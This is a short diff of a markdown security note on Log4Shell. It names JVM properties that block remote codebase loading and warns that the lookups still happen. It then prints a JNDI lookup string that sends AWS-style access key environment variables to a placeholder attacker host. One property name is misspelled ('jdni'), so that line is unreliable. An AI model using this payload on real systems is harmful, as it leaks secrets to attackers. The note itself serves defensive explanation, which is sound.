Kibuns/Research/Security.md

 com.sun.jndi.ldap.object.trustURLCodebase
 com.sun.jdni.rmi.object.trustURLCodebase
 ```
 This however won't stop your application from actually making the call.
 It only stops the contents of that call from doing anything.
-This still enables hackers to make your application leak it's environment variables, like in the code below
+This still enables hackers to make your application leak it's environment variables, like in the code below:
 ```java
 ${jndi:ldap://malicious_atacker:123/${env:ACCES_KEY_ID}/${env:SECRET_ACCES_KEY}}
 ```